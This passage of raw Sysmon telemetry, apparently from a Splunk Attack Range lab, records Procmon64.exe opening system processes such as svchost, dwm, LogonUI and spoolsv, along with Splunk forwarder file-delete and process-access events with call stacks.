Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217464Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:44.865{4F8D34B0-12B0-6216-7A04-000000003902}3792C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000217463Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:44.426{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71A4E3D380395B5CD88119A3BA0671C1,SHA256=89D38F81AACACBCA33E03C42D0204583D7DA1E512074FD39C6A4BDFECE09BC40,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289670Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:44.875{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-1200-000000003802}8C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289669Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:44.875{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-1100-000000003802}408C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289668Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:44.760{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-1100-000000003802}408C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289667Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:44.760{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289666Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:44.422{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289665Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:44.422{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-0F00-000000003802}304C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289664Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:44.289{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-0F00-000000003802}304C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289663Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:44.273{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-0E00-000000003802}988C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289662Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:44.172{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-0E00-000000003802}988C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289661Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:44.172{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-0D00-000000003802}888C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289660Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:44.088{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-0D00-000000003802}888C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289659Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:44.088{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-0C00-000000003802}828C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000289658Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:44.088{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33A745807CB12234EBE04B5ACB71CD96,SHA256=64E8AA3385A28F753FC2D1CA68F8A15832405C2357BB41B61D0CA572CFBA96FB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289687Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:45.946{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2600-000000003802}2884C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289686Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:45.946{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F129-6215-2300-000000003802}2720C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289685Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:45.846{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F129-6215-2300-000000003802}2720C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289684Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:45.846{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F120-6215-1C00-000000003802}1688C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289683Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:45.761{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F120-6215-1C00-000000003802}1688C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289682Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:45.761{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F120-6215-1700-000000003802}1460C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289681Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:45.695{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F120-6215-1700-000000003802}1460C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289680Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:45.695{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289679Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:45.507{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289678Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:45.492{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289677Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:45.322{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289676Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:45.307{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-1400-000000003802}1048C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289675Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:45.176{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-1400-000000003802}1048C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289674Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:45.160{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-1300-000000003802}616C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000289673Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:45.108{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E1B7FB8EEA8548C4ABFAEAF57BBFC1C,SHA256=781B483B30E3C9886D3C630B5E71CCF1535F6A2F1FADA0C640E8F89BB212C189,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217491Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:45.770{4F8D34B0-12B1-6216-7B04-000000003902}34961260C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217490Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:45.488{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-12B1-6216-7B04-000000003902}3496C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217489Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:45.488{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217488Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:45.488{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217487Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 